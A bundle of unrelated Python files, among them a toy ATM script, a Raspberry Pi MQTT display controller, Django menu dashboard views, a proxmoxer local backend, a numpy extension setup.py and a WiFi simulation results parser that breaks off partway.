download_jpg(url, strPath, image_name)
except Exception as error:
print(error)
def download_jpg(url, filePath, fileName):
fullPath = f"{filePath}/{fileName}"
urllib.request.urlretrieve(url, fullPath)
def setup(strQueryString):
dirName = 'images_' + strQueryString.replace(' ', '_')
strPath = f"{dirName}"
try:
os.mkdir(strPath)
except:
pass
return strPath
|
import time
print("Welcome to MY ATM")
print("Swipe Card")
amount=1000000
o="4078"
print("_________________")
p=input("enter pin")
print("Verifying.......!!")
time.sleep(3)
if p==o:
print("1.Cash Withdrawl")
print("2.Check enquiry")
print("3.Balance enquiry")
print("4.Print receipt")
print("5.Mini Statement")
print("6.Exit")
ch=int(input("enter your choice"))
if ch==1:
print("c.Current")
print("s.Savings")
print("________________")
h=input("enter your option")
if h=='c':
wdraw=input("enter the amount to be withdraw:")
print("Transaction Done")
print("Take Amount")
print("Hope you had nice time")
else:
sdraw=input("enter the amount to withdraw:")
print("Transaction Successful")
print("Take amount")
print("Hope you had nice time")
elif ch==2:
print(f"Current Balance is {amount}")
print("Hope you had nice time")
elif ch==3:
print(f"Balance is {amount}")
print("Hope you had nice time")
elif ch==4:
yn=input("Print Receipt.{amount} yes/no")
if yn=='yes':
print("Take Receipt")
elif yn=='no':
print("Hope you had nice time")
else:
print("error 404")
elif ch==5:
print("Take your mini statement of balance")
print("Hope you had nice time")
elif ch==6:
exit()
else:
print("error")
else:
print("Invalid Pin ,Try again")
|
import numpy as np
import matplotlib.pyplot as mp
import time
from NeuralNetwork import Neural_Network
fileStr = 'C:\\Users\\WahSeng\\Desktop\\Neural Network Tutorial\\TrainingData.txt'
# Open the file and read the contents
data = np.genfromtxt(fileStr)
# Load data
tin = data[:,0:2]
tout = data[:,2:3]
# Normalize data
maxTin1 = np.max(tin[:,0])
maxTin2 = np.max(tin[:,1])
maxTout = np.max(tout)
tin[:,0] = tin[:,0] / maxTin1
tin[:,1] = tin[:,1] / maxTin2
tout = tout / maxTout
print('Training')
startTime = time.clock()
# Training data
scalar = 3.
nn = Neural_Network()
cost = nn.costFunction(tin,tout)
costArray = cost
while cost > 0.01:
dJdW1,dJdW2 = nn.costFunctionPrime(tin,tout)
nn.W1 = nn.W1 - scalar*(dJdW1)
nn.W2 = nn.W2 - scalar*(dJdW2)
cost = nn.costFunction(tin,tout)
print(cost)
costArray = np.append(costArray,cost)
endTime = time.clock()
print('Total Time :',endTime - startTime)
print(tin)
print(nn.yHat)
# Plot graph
np.savetxt('W1.out',nn.W1)
np.savetxt('W2.out',nn.W2)
fout = open('C:\\Users\\WahSeng\\Desktop\\Neural Network Tutorial\\W1.txt','w')
fout.write(str(nn.W1))
fout.close()
fout = open('C:\\Users\\WahSeng\\Desktop\\Neural Network Tutorial\\W2.txt','w')
fout.write(str(nn.W2))
fout.close()
mp.plot( - 1/np.log(costArray),'b-^')
mp.title('Cost function')
mp.xlabel('Iteration')
mp.ylabel('Cost')
mp.show()
print(nn.forward([800/maxTin1,1/maxTin2])*maxTout)
|
# word = list(map(str, input()))
# alpha = list('abcdefghijklmnopqrstuvwxyz')
# alpha_list = [-1 for i in range(len(alpha))]
# for i in range(len(word)):
# if alpha_list[alpha.index(word[i])] == -1:
# alpha_list[alpha.index(word[i])] = i
# for i in alpha_list:
# print(i, end= ' ')
word = input()
alpha = 'abcdefghijklmnopqrstuvwxyz'
for i in alpha:
if i in word:
print(word.index(i), end=' ')
else:
print(-1, end=' ') |
from serial import Serial
import RPi.GPIO as GPIO
import time
import paho.mqtt.client as mqtt
ser=Serial("/dev/ttyACM0",9600) #change ACM number as found from ls /dev/tty/ACM*
ser.baudrate=9600
def blink(pin):
GPIO.output(pin,GPIO.HIGH)
time.sleep(1)
GPIO.output(pin,GPIO.LOW)
time.sleep(1)
return
def display8numero(numero,lugar):
pinA = 21
pinB = 33
pinC = 11
pinD = 5
pinE = 3
pinF = 23
pinG = 13
pinD1 = 19
pinD3 = 29
pinD2 = 31
pinD4 = 15
GPIO.output(pinD1,GPIO.LOW)
GPIO.output(pinD2,GPIO.LOW)
GPIO.output(pinD3,GPIO.LOW)
GPIO.output(pinD4,GPIO.LOW)
GPIO.output(pinA,GPIO.HIGH)
GPIO.output(pinB,GPIO.HIGH)
GPIO.output(pinC,GPIO.HIGH)
GPIO.output(pinD,GPIO.HIGH)
GPIO.output(pinE,GPIO.HIGH)
GPIO.output(pinF,GPIO.HIGH)
GPIO.output(pinG,GPIO.HIGH)
if(lugar == 0):
GPIO.output(pinD1,GPIO.HIGH)
GPIO.output(pinD2,GPIO.LOW)
GPIO.output(pinD3,GPIO.LOW)
GPIO.output(pinD4,GPIO.LOW)
if(lugar == 1):
GPIO.output(pinD1,GPIO.LOW)
GPIO.output(pinD2,GPIO.HIGH)
GPIO.output(pinD3,GPIO.LOW)
GPIO.output(pinD4,GPIO.LOW)
if(lugar == 2):
GPIO.output(pinD1,GPIO.LOW)
GPIO.output(pinD2,GPIO.LOW)
GPIO.output(pinD3,GPIO.HIGH)
GPIO.output(pinD4,GPIO.LOW)
if(lugar == 3):
GPIO.output(pinD1,GPIO.LOW)
GPIO.output(pinD2,GPIO.LOW)
GPIO.output(pinD3,GPIO.LOW)
GPIO.output(pinD4,GPIO.HIGH)
if(numero == 0):
GPIO.output(pinA,GPIO.LOW)
GPIO.output(pinB,GPIO.LOW)
GPIO.output(pinC,GPIO.LOW)
GPIO.output(pinD,GPIO.LOW)
GPIO.output(pinE,GPIO.LOW)
GPIO.output(pinF,GPIO.LOW)
GPIO.output(pinG,GPIO.HIGH)
if(numero == 1):
GPIO.output(pinA,GPIO.HIGH)
GPIO.output(pinB,GPIO.LOW)
GPIO.output(pinC,GPIO.LOW)
GPIO.output(pinD,GPIO.HIGH)
GPIO.output(pinE,GPIO.HIGH)
GPIO.output(pinF,GPIO.HIGH)
GPIO.output(pinG,GPIO.HIGH)
if(numero == 2):
GPIO.output(pinA,GPIO.LOW)
GPIO.output(pinB,GPIO.LOW)
GPIO.output(pinC,GPIO.HIGH)
GPIO.output(pinD,GPIO.LOW)
GPIO.output(pinE,GPIO.LOW)
GPIO.output(pinF,GPIO.HIGH)
GPIO.output(pinG,GPIO.LOW)
if(numero == 3):
GPIO.output(pinA,GPIO.LOW)
GPIO.output(pinB,GPIO.LOW)
GPIO.output(pinC,GPIO.LOW)
GPIO.output(pinD,GPIO.LOW)
GPIO.output(pinE,GPIO.HIGH)
GPIO.output(pinF,GPIO.HIGH)
GPIO.output(pinG,GPIO.LOW)
if(numero == 4):
GPIO.output(pinA,GPIO.HIGH)
GPIO.output(pinB,GPIO.LOW)
GPIO.output(pinC,GPIO.LOW)
GPIO.output(pinD,GPIO.HIGH)
GPIO.output(pinE,GPIO.HIGH)
GPIO.output(pinF,GPIO.LOW)
GPIO.output(pinG,GPIO.LOW)
if(numero == 5):
GPIO.output(pinA,GPIO.LOW)
GPIO.output(pinB,GPIO.HIGH)
GPIO.output(pinC,GPIO.LOW)
GPIO.output(pinD,GPIO.LOW)
GPIO.output(pinE,GPIO.HIGH)
GPIO.output(pinF,GPIO.LOW)
GPIO.output(pinG,GPIO.LOW)
if(numero == 6):
GPIO.output(pinA,GPIO.LOW)
GPIO.output(pinB,GPIO.HIGH)
GPIO.output(pinC,GPIO.LOW)
GPIO.output(pinD,GPIO.LOW)
GPIO.output(pinE,GPIO.LOW)
GPIO.output(pinF,GPIO.LOW)
GPIO.output(pinG,GPIO.LOW)
if(numero == 7):
GPIO.output(pinA,GPIO.LOW)
GPIO.output(pinB,GPIO.LOW)
GPIO.output(pinC,GPIO.LOW)
GPIO.output(pinD,GPIO.HIGH)
GPIO.output(pinE,GPIO.HIGH)
GPIO.output(pinF,GPIO.HIGH)
GPIO.output(pinG,GPIO.HIGH)
if(numero == 8):
GPIO.output(pinA,GPIO.LOW)
GPIO.output(pinB,GPIO.LOW)
GPIO.output(pinC,GPIO.LOW)
GPIO.output(pinD,GPIO.LOW)
GPIO.output(pinE,GPIO.LOW)
GPIO.output(pinF,GPIO.LOW)
GPIO.output(pinG,GPIO.LOW)
if(numero == 9):
GPIO.output(pinA,GPIO.LOW)
GPIO.output(pinB,GPIO.LOW)
GPIO.output(pinC,GPIO.LOW)
GPIO.output(pinD,GPIO.HIGH)
GPIO.output(pinE,GPIO.HIGH)
GPIO.output(pinF,GPIO.LOW)
GPIO.output(pinG,GPIO.LOW)
GPIO.setmode(GPIO.BOARD)
GPIO.setup(37, GPIO.OUT)
p = GPIO.PWM(37,50)
p.start(7.5)
def on_connect(client, userdata, flags, rc):
print("Connected with result code" + str(rc))
client.subscribe("sensores")
def on_message(client, userdata, msg):
grados = int(str(msg.payload))
print(grados)
p.ChangeDutyCycle(7.5+(0.06*grados))
print(msg.topic+" "+str(msg.payload))
GPIO.setup(3, GPIO.OUT)
GPIO.setup(5, GPIO.OUT)
GPIO.setup(11, GPIO.OUT)
GPIO.setup(13, GPIO.OUT)
GPIO.setup(15, GPIO.OUT)
GPIO.setup(19, GPIO.OUT)
GPIO.setup(21, GPIO.OUT)
GPIO.setup(23, GPIO.OUT)
GPIO.setup(29, GPIO.OUT)
GPIO.setup(31, GPIO.OUT)
GPIO.setup(33, GPIO.OUT)
numero = 0
lugar = 0
idx = 0
client = mqtt.Client(client_id="lautaro")
client.on_connect = on_connect
client.on_message = on_message
client.connect("192.168.3.22",1883,60)
client.subscribe("sensores")
client.loop_start()
data = "0"
data2 = "0"
posicion = 0
while True:
read_ser=ser.readline()
data = read_ser.strip().decode("utf-8")
for a in range(200):
for l in range(len(data2)):
display8numero(int(data2[l]),(int(l)))
idx += 1
if (idx % 50) == 0:
print(data)
data2 = data
idx = 0
|
"""
This module describe data model for "tag_association" table
tag_association table filled automatically by SQLalchemy.
It provides many to many relation between restaurant and tag
"""
from sqlalchemy import (
Column,
Integer,
ForeignKey,
)
from sqlalchemy.orm import relationship
from .meta import Base
class OrderAssoc(Base):
"""
The data model of "tag_association" table
Defines data structure of "tag_association" table
"""
__tablename__ = 'order_associations'
id = Column(Integer, primary_key=True)
quantity = Column(Integer)
item_id = Column(Integer, ForeignKey('menu_items.id'))
order_id = Column(Integer, ForeignKey('orders.id'))
order = relationship('Order')
food = relationship('MenuItem')
|
from django.conf.urls import url
from mrbelvedereci.github import views as github_views
urlpatterns = [
url(r'^$', github_views.repo_list),
url(r'^repo/(?P<owner>\w+)/(?P<name>[^/].*)/branch/(?P<branch>.*)$', github_views.branch_detail),
url(r'^repo/(?P<owner>\w+)/(?P<name>[^/].*)/commit/(?P<sha>\w+)$', github_views.commit_detail),
url(r'^repo/(?P<owner>\w+)/(?P<name>[^/].*)/*$', github_views.repo_detail),
url(r'^webhook/github/push$', github_views.github_push_webhook),
]
|
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
from flask_login import LoginManager
from flask_bcrypt import Bcrypt
from shop.config import DevConfig
from flask_migrate import Migrate
app=Flask(__name__)
app.config.from_object(DevConfig)
db=SQLAlchemy(app)
bcrypt=Bcrypt(app)
login_manager=LoginManager(app)
migrate=Migrate(app,db)
from shop import views
|
from django.shortcuts import render,redirect, get_object_or_404
from django.contrib.sites.shortcuts import get_current_site
from django.contrib.auth.decorators import permission_required
from ..views import staff_member_required
from django.contrib.sites.shortcuts import get_current_site
from django.template.response import TemplateResponse
from menu.models import Menu, MenuItem
from core.utils import get_paginator_items
from dashboard.menu.utils import get_menu_obj_text, update_menu
from django.contrib import messages
from django.utils.translation import pgettext_lazy
from django.http import JsonResponse
from django.db.models import Q
from django.urls import reverse
from .forms import AssignMenuForm, MenuForm, MenuItemForm
from page.models import Page
from menu.models import Category
# Create your views here.
@staff_member_required
@permission_required('core.manage_settings')
def index(request):
menus = Menu.objects.all()
menus = get_paginator_items(menus,request.GET.get('page'))
site_settings = get_current_site(request).settings
assign_menu_form = AssignMenuForm(request.POST or None,instance=site_settings)
if request.POST and assign_menu_form.is_valid():
assign_menu_form.save()
msg = pgettext_lazy(
'Dashboard message', 'Updated storefront menus')
messages.success(request, msg)
return redirect('dashboard:menu-index')
ctx = {
'menus' : menus,
'assign_menu_form' : assign_menu_form,
'site_settings' : site_settings,
}
return TemplateResponse(request, 'dashboard/menu/index.html', ctx)\
@staff_member_required
@permission_required('core.manage_settings')
def menu_details(request, pk):
menu = get_object_or_404(Menu, pk=pk)
menu_items = menu.items.filter(parent=None).prefetch_related(
'category', 'page')
ctx = {
'menu': menu,
'menu_items': menu_items,
}
return TemplateResponse(request, 'dashboard/menu/details.html', ctx)\
@staff_member_required
@permission_required('core.manage_settings')
def menu_item_details (request, menu_pk, item_pk):
menu = get_object_or_404(Menu, pk=menu_pk)
menu_item = menu.items.get(pk=item_pk)
menu_items = menu_item.get_children().order_by('sort_order')
ctx = {
'menu': menu,
'menu_items': menu_items,
'menu_item': menu_item,
}
return TemplateResponse(request, 'dashboard/menu/item/details.html', ctx)
@staff_member_required
@permission_required('core.manage_settings')
def menu_create (request):
menu = Menu()
menu_form = MenuForm(request.POST, instance=menu)
if menu_form.is_valid() and menu_form.has_changed() and request.POST:
menu = menu_form.save()
msg = pgettext_lazy('Dashboard message', 'Added menu %s') % (menu,)
messages.success(request, msg)
return redirect('dashboard:menu-index')
ctx = {
'form': menu_form,
'menu': menu
}
return TemplateResponse(request, 'dashboard/menu/form.html', ctx)
@staff_member_required
@permission_required('menu.manage_menus')
def menu_edit(request, pk):
menu = get_object_or_404(Menu, pk=pk)
menu_form = MenuForm(request.POST or None, instance=menu)
if menu_form.is_valid() and menu_form.has_changed() and request.POST:
menu = menu_form.save()
msg = pgettext_lazy('Dashboard message', 'Updated menu %s') % (menu,)
messages.success(request, msg)
return redirect('dashboard:menu-details', pk=menu.pk)
ctx = {
'form': menu_form,
'menu': menu
}
return TemplateResponse(request, 'dashboard/menu/form.html', ctx)
@staff_member_required
@permission_required('menu.manage_menus')
def menu_delete(request, pk):
menu = get_object_or_404(Menu, pk=pk)
if request.method == 'POST':
menu.delete()
msg = pgettext_lazy('Dashboard message', 'Removed menu %s') % (menu,)
messages.success(request, msg)
return redirect('dashboard:menu-list')
ctx = {
'menu': menu, 'descendants': list(menu.items.all())}
return TemplateResponse(
request, 'dashboard/menu/modal/confirm_delete.html', ctx)
@staff_member_required
@permission_required('menu.manage_menus')
def ajax_menu_links(request):
def get_obj_repr(obj):
obj_id = str(obj.pk) + '_' + obj.__class__.__name__
return {
'id': obj_id,
'text': get_menu_obj_text(obj)}
def get_group_repr(model, label, filter_fields, query):
queryset = model.objects.all()
if search_query and search_query.lower() not in label.lower():
kwargs = {
'%s__contains' % (field,): query for field in filter_fields}
queryset = queryset.filter(Q(**kwargs))
return {
'text': label,
'children': [get_obj_repr(obj) for obj in queryset]}
search_query = request.GET.get('q', '')
groups = [
get_group_repr(
Category,
pgettext_lazy('Link object type group description', 'Category'),
('name',),
search_query),
get_group_repr(
Page,
pgettext_lazy('Link object type group description', 'Page'),
('title',),
search_query)
]
groups = [group for group in groups if len(group.get('children')) > 0]
return JsonResponse({'results': groups})
@staff_member_required
@permission_required('menu.manage_menus')
def menu_item_create(request, menu_pk, root_pk=None):
menu = get_object_or_404(Menu, pk=menu_pk)
path = None
if root_pk:
root = get_object_or_404(MenuItem, pk=root_pk)
path = root.get_ancestors(include_self=True)
menu_item = MenuItem(menu=menu, parent=root)
else:
menu_item = MenuItem(menu=menu)
form = MenuItemForm(request.POST or None, instance=menu_item)
if form.is_valid():
menu_item = form.save()
msg = pgettext_lazy(
'Dashboard message', 'Added menu item %s') % (menu_item,)
messages.success(request, msg)
update_menu(menu)
if root_pk:
return redirect(
'dashboard:menu-item-details',
menu_pk=menu.pk, item_pk=root_pk)
return redirect('dashboard:menu-details', pk=menu.pk)
ctx = {
'form': form, 'menu': menu, 'menu_item': menu_item, 'path': path}
return TemplateResponse(request, 'dashboard/menu/item/form.html', ctx)
@staff_member_required
@permission_required('menu.manage_menus')
def menu_item_delete(request, menu_pk, item_pk):
menu = get_object_or_404(Menu, pk=menu_pk)
menu_item = get_object_or_404(menu.items.all(), pk=item_pk)
if request.method == 'POST':
menu_item.delete()
update_menu(menu)
msg = pgettext_lazy(
'Dashboard message', 'Removed menu item %s') % (menu_item,)
messages.success(request, msg)
root_pk = menu_item.parent.pk if menu_item.parent else None
if root_pk:
redirect_url = reverse(
'dashboard:menu-item-details', kwargs={
'menu_pk': menu_item.menu.pk, 'item_pk': root_pk})
else:
redirect_url = reverse(
'dashboard:menu-details', kwargs={'pk': menu.pk})
return (
JsonResponse({'redirectUrl': redirect_url}) if request.is_ajax()
else redirect(redirect_url))
ctx = {
'menu_item': menu_item,
'descendants': list(menu_item.get_descendants())}
return TemplateResponse(
request, 'dashboard/menu/item/modal/confirm_delete.html', ctx)
@staff_member_required
@permission_required('menu.manage_menus')
def menu_item_edit(request, menu_pk, item_pk):
menu = get_object_or_404(Menu, pk=menu_pk)
menu_item = get_object_or_404(menu.items.all(), pk=item_pk)
path = menu_item.get_ancestors(include_self=True)
form = MenuItemForm(request.POST or None, instance=menu_item)
if form.is_valid():
menu_item = form.save()
update_menu(menu)
msg = pgettext_lazy(
'Dashboard message', 'Saved menu item %s') % (menu_item,)
messages.success(request, msg)
return redirect(
'dashboard:menu-item-details', menu_pk=menu.pk, item_pk=item_pk)
ctx = {
'form': form, 'menu': menu, 'menu_item': menu_item, 'path': path}
return TemplateResponse(request, 'dashboard/menu/item/form.html', ctx)
|
__author__ = "Markus Reiter"
__copyright__ = "(c) Markus Reiter 2022"
__license__ = "MIT"
import shutil
from subprocess import PIPE, Popen
from proxmoxer.backends.command_base import CommandBaseBackend, CommandBaseSession
class LocalSession(CommandBaseSession):
def _exec(self, cmd):
proc = Popen(cmd, stdout=PIPE, stderr=PIPE)
stdout, stderr = proc.communicate(timeout=self.timeout)
return stdout.decode(), stderr.decode()
def upload_file_obj(self, file_obj, remote_path):
with open(remote_path, "wb") as dest_fp:
shutil.copyfileobj(file_obj, dest_fp)
class Backend(CommandBaseBackend):
def __init__(self, *args, **kwargs):
self.session = LocalSession(*args, **kwargs)
self.target = "localhost"
|
import sys
import os
from distutils.core import setup, Extension
incDirList= []
libDirList= []
libList= []
defList= []
undefList= []
otherCompileFlags= []
otherLinkFlags= []
if 'CFLAGS' in os.environ:
cflags= os.environ['CFLAGS']
else:
cflags= ''
words= cflags.split()
for word in words:
if word.startswith('-D'):
word= word[2:]
loc= word.find('=')
if (loc>=0):
defList.append((word[:loc-1],word[loc+1:]))
else:
defList.append((word,None))
elif word.startswith('-U'):
undefList.append(word[2:])
elif word.startswith('-I'):
incDirList.append(word[2:])
else:
otherCompileFlags.append(word)
if 'LFLAGS' in os.environ:
lflags= os.environ['LFLAGS']
else:
lflags= ''
words= lflags.split()
for word in words:
if word.startswith('-L'):
libDirList.append(word[2:])
elif word.startswith('-l'):
libList.append(word[2:])
else:
otherLinkFlags.append(word)
# Obtain the numpy include directory. This logic works across numpy versions.
try:
import numpy
numpy_include = numpy.get_include()
except ImportError:
sys.exit("The python package 'numpy' is not installed!")
except AttributeError:
numpy_include = numpy.get_numpy_include()
incDirList.append(numpy_include)
setup(name="fiasco_numpy",
version='1.0',
py_modules=['fiasco_numpy'],
ext_modules=[Extension('_fiasco_numpy',
['glm.c','glm_irls.c',
'optimizer.c','interpolator.c',
'kalmanfilter.c',
'fiasco_numpy_wrap.c'],
define_macros=defList,
undef_macros=undefList,
include_dirs=incDirList,
extra_compile_args=otherCompileFlags,
library_dirs=libDirList,
libraries=libList,
extra_link_args=otherLinkFlags
)
],
description='Python numpy interface for Fiasco/FIAT libs',
author='Joel Welling',
author_email='welling@psc.edu',
url='http://www.stat.cmu.edu/~fiasco',
)
|
import sys
import math
from collections import defaultdict
import numpy as np
LOG_PATH_random="summary_results.txt"
POUR_PLOT_deficit="plot_deficit"
POUR_PLOT_throughput="plot_throughput"
POUR_PLOT_APs_std_load="plot_APs_std_load"
POUR_PLOT_APs_maximum_load="plot_APs_maximum_load"
POUR_PLOT_clients_Nb_deficit="plot_clients_Nb_deficit"
POUR_PLOT_deficit_classes="plot_deficit_classes"
POUR_PLOT_throughput_classes="plot_throughput_classes"
POUR_PLOT_clients_Nb_deficit_class="plot_clients_Nb_deficit_classes"
f_Q_priority=open(LOG_PATH_random,"r")
g_deficit=open(POUR_PLOT_deficit,"w")
g_throughput=open(POUR_PLOT_throughput,"w")
g_APs_std_load=open(POUR_PLOT_APs_std_load,"w")
g_APs_maximum_load=open(POUR_PLOT_APs_maximum_load,"w")
g_clients_Nb_deficit=open(POUR_PLOT_clients_Nb_deficit,"w")
g_PLOT_deficit_classes=open(POUR_PLOT_deficit_classes,"w")
g_throughput_classes=open(POUR_PLOT_throughput_classes,"w")
g_clients_Nb_deficit_class=open(POUR_PLOT_clients_Nb_deficit_class,"w")
nb_repetition=10
priority_class=4
for density_nodes in range(1,21): #case random, jusqu'a density=40 noeuds
#for density_nodes in range(1,7): #case random, jusqu'a density=30 noeuds
#for density_nodes in range(1,2):
moy_deficit_priority=0
moy_throughput_priority=0
moy_std_load_priority=0
moy_maximum_load_priority=0
moy_clients_deficit_priority=0
erreur_deficit_priority=0
erreur_throughput_priority=0
erreur_std_load_priority=0
erreur_maximum_load_priority=0
erreur_clients_deficit_priority=0
moy_deficit_RSSI=0
moy_throughput_RSSI=0
moy_std_load_RSSI=0
moy_maximum_load_RSSI=0
moy_clients_deficit_RSSI=0
erreur_deficit_RSSI=0
erreur_throughput_RSSI=0
erreur_std_load_RSSI=0
erreur_maximum_load_RSSI=0
erreur_clients_deficit_RSSI=0
moy_deficit_FF=0
moy_throughput_FF=0
moy_std_load_FF=0
moy_maximum_load_FF=0
moy_clients_deficit_FF=0
erreur_deficit_FF=0
erreur_throughput_FF=0
erreur_std_load_FF=0
erreur_maximum_load_FF=0
erreur_clients_deficit_FF=0
moy_deficit_LL=0
moy_throughput_LL=0
moy_std_load_LL=0
moy_maximum_load_LL=0
moy_clients_deficit_LL=0
erreur_deficit_LL=0
erreur_throughput_LL=0
erreur_std_load_LL=0
erreur_maximum_load_LL=0
erreur_clients_deficit_LL=0
moy_deficit_classes=defaultdict() #c[i][j]=48
moy_throughput_classes=defaultdict()
moy_clients_deficit_classes=defaultdict()
erreur_deficit_classes=defaultdict() #c[i][j]=48
erreur_throughput_classes=defaultdict()
erreur_clients_deficit_classes=defaultdict()
moy_deficit_RSSI_classes=defaultdict() #c[i][j]=48
moy_throughput_RSSI_classes=defaultdict()
moy_clients_deficit_RSSI_classes=defaultdict()
erreur_deficit_RSSI_classes=defaultdict() #c[i][j]=48
erreur_throughput_RSSI_classes=defaultdict()
erreur_clients_deficit_RSSI_classes=defaultdict()
moy_deficit_FF_classes=defaultdict() #c[i][j]=48
moy_throughput_FF_classes=defaultdict()
moy_clients_deficit_FF_classes=defaultdict()
erreur_deficit_FF_classes=defaultdict() #c[i][j]=48
erreur_throughput_FF_classes=defaultdict()
erreur_clients_deficit_FF_classes=defaultdict()
moy_deficit_LL_classes=defaultdict() #c[i][j]=48
moy_throughput_LL_classes=defaultdict()
moy_clients_deficit_LL_classes=defaultdict()
erreur_deficit_LL_classes=defaultdict() #c[i][j]=48
erreur_throughput_LL_classes=defaultdict()
erreur_clients_deficit_LL_classes=defaultdict()
for cla in range(0,priority_class):
moy_deficit_classes[cla]=0
moy_throughput_classes[cla]=0
moy_clients_deficit_classes[cla]=0
erreur_deficit_classes[cla]=0
erreur_throughput_classes[cla]=0
erreur_clients_deficit_classes[cla]=0
moy_deficit_RSSI_classes[cla]=0
moy_throughput_RSSI_classes[cla]=0
moy_clients_deficit_RSSI_classes[cla]=0
erreur_deficit_RSSI_classes[cla]=0
erreur_throughput_RSSI_classes[cla]=0
erreur_clients_deficit_RSSI_classes[cla]=0
moy_deficit_FF_classes[cla]=0
moy_throughput_FF_classes[cla]=0
moy_clients_deficit_FF_classes[cla]=0
erreur_deficit_FF_classes[cla]=0
erreur_throughput_FF_classes[cla]=0
erreur_clients_deficit_FF_classes[cla]=0
moy_deficit_LL_classes[cla]=0
moy_throughput_LL_classes[cla]=0
moy_clients_deficit_LL_classes[cla]=0
erreur_deficit_LL_classes[cla]=0
erreur_throughput_LL_classes[cla]=0
erreur_clients_deficit_LL_classes[cla]=0
val_deficit_priority={}
val_throughput_priority={}
val_std_load_priority={}
val_maximum_load_priority={}
val_clients_deficit_priority={}
val_deficit_RSSI={}
val_throughput_RSSI={}
val_std_load_RSSI={}
val_maximum_load_RSSI={}
val_clients_deficit_RSSI={}
val_deficit_FF={}
val_throughput_FF={}
val_std_load_FF={}
val_maximum_load_FF={}
val_clients_deficit_FF={}
val_deficit_LL={}
val_throughput_LL={}
val_std_load_LL={}
val_maximum_load_LL={}
val_clients_deficit_LL={}
val_deficit_classes={}
val_throughput_classes={}
val_clients_deficit_classes={}
val_deficit_classes_RSSI={}
val_throughput_classes_RSSI={}
val_clients_deficit_classes_RSSI={}
val_deficit_classes_FF={}
val_throughput_classes_FF={}
val_clients_deficit_classes_FF={}
val_deficit_classes_LL={}
val_throughput_classes_LL={}
val_clients_deficit_classes_LL={}
for cla in range(0,priority_class):
val_deficit_classes[cla]={}
val_throughput_classes[cla]={}
val_clients_deficit_classes[cla]={}
val_deficit_classes_RSSI[cla]={}
val_throughput_classes_RSSI[cla]={}
val_clients_deficit_classes_RSSI[cla]={}
val_deficit_classes_FF[cla]={}
val_throughput_classes_FF[cla]={}
val_clients_deficit_classes_FF[cla]={}
val_deficit_classes_LL[cla]={}
val_throughput_classes_LL[cla]={}
val_clients_deficit_classes_LL[cla]={}
for repetition in range(0,nb_repetition):
line_den_case_repet=f_Q_priority.readline()
line_deficit=f_Q_priority.readline()
line_throughput=f_Q_priority.readline()
line_std_load=f_Q_priority.readline()
line_maximum_load=f_Q_priority.readline()
line_clients_deficit=f_Q_priority.readline()
line_vide=f_Q_priority.readline()
line_deficit_classes={}
for cla in range(0,priority_class):
line_deficit_classes[cla]=f_Q_priority.readline()
line_vide=f_Q_priority.readline()
line_throughput_classes={}
for cla in range(0,priority_class):
line_throughput_classes[cla]=f_Q_priority.readline()
line_vide=f_Q_priority.readline()
line_nb_deficit_classes={}
for cla in range(0,priority_class):
line_nb_deficit_classes[cla]=f_Q_priority.readline()
line_vide=f_Q_priority.readline()
analyse_deficit=line_deficit.strip().split()
analyse_throughput=line_throughput.strip().split()
analyse_std_load=line_std_load.strip().split()
analyse_maximum_load=line_maximum_load.strip().split()
analyse_clients_deficit=line_clients_deficit.strip().split()
analyse_deficit_classes={}
analyse_throughput_classes={}
analyse_clients_deficit_classes={}
for cla in range(0,priority_class):
analyse_deficit_classes[cla]=line_deficit_classes[cla].strip().split()
analyse_throughput_classes[cla]=line_throughput_classes[cla].strip().split()
analyse_clients_deficit_classes[cla]=line_nb_deficit_classes[cla].strip().split()
val_deficit_priority[repetition]=float(analyse_deficit[2])
val_throughput_priority[repetition]=float(analyse_throughput[2])
val_std_load_priority[repetition]=float(analyse_std_load[4])
val_maximum_load_priority[repetition]=float(analyse_maximum_load[4])
val_clients_deficit_priority[repetition]=float(analyse_clients_deficit[5])
val_deficit_RSSI[repetition]=float(analyse_deficit[3])
val_throughput_RSSI[repetition]=float(analyse_throughput[3])
val_std_load_RSSI[repetition]=float(analyse_std_load[5])
val_maximum_load_RSSI[repetition]=float(analyse_maximum_load[5])
val_clients_deficit_RSSI[repetition]=float(analyse_clients_deficit[6])
val_deficit_FF[repetition]=float(analyse_deficit[4])
val_throughput_FF[repetition]=float(analyse_throughput[4])
val_std_load_FF[repetition]=float(analyse_std_load[6])
val_maximum_load_FF[repetition]=float(analyse_maximum_load[6])
val_clients_deficit_FF[repetition]=float(analyse_clients_deficit[7])
val_deficit_LL[repetition]=float(analyse_deficit[5])
val_throughput_LL[repetition]=float(analyse_throughput[5])
val_std_load_LL[repetition]=float(analyse_std_load[7])
val_maximum_load_LL[repetition]=float(analyse_maximum_load[7])
val_clients_deficit_LL[repetition]=float(analyse_clients_deficit[8])
for cla in range(0,priority_class):
val_deficit_classes[cla][repetition]=float(analyse_deficit_classes[cla][4])
val_throughput_classes[cla][repetition]=float(analyse_throughput_classes[cla][4])
val_clients_deficit_classes[cla][repetition]=float(analyse_clients_deficit_classes[cla][6])
val_deficit_classes_RSSI[cla][repetition]=float(analyse_deficit_classes[cla][5])
val_throughput_classes_RSSI[cla][repetition]=float(analyse_throughput_classes[cla][5])
val_clients_deficit_classes_RSSI[cla][repetition]=float(analyse_clients_deficit_classes[cla][7])
val_deficit_classes_FF[cla][repetition]=float(analyse_deficit_classes[cla][6])
val_throughput_classes_FF[cla][repetition]=float(analyse_throughput_classes[cla][6])
val_clients_deficit_classes_FF[cla][repetition]=float(analyse_clients_deficit_classes[cla][8])
val_deficit_classes_LL[cla][repetition]=float(analyse_deficit_classes[cla][7])
val_throughput_classes_LL[cla][repetition]=float(analyse_throughput_classes[cla][7])
val_clients_deficit_classes_LL[cla][repetition]=float(analyse_clients_deficit_classes[cla][9])
moy_deficit_priority=moy_deficit_priority+val_deficit_priority[repetition]
moy_throughput_priority=moy_throughput_priority+val_throughput_priority[repetition]
moy_std_load_priority=moy_std_load_priority+val_std_load_priority[repetition]
moy_maximum_load_priority=moy_maximum_load_priority+val_maximum_load_priority[repetition]
moy_clients_deficit_priority=moy_clients_deficit_priority+val_clients_deficit_priority[repetition]
moy_deficit_RSSI=moy_deficit_RSSI+val_deficit_RSSI[repetition]
moy_throughput_RSSI=moy_throughput_RSSI+val_throughput_RSSI[repetition]
moy_std_load_RSSI=moy_std_load_RSSI+val_std_load_RSSI[repetition]
moy_maximum_load_RSSI=moy_maximum_load_RSSI+val_maximum_load_RSSI[repetition]
moy_clients_deficit_RSSI=moy_clients_deficit_RSSI+val_clients_deficit_RSSI[repetition]
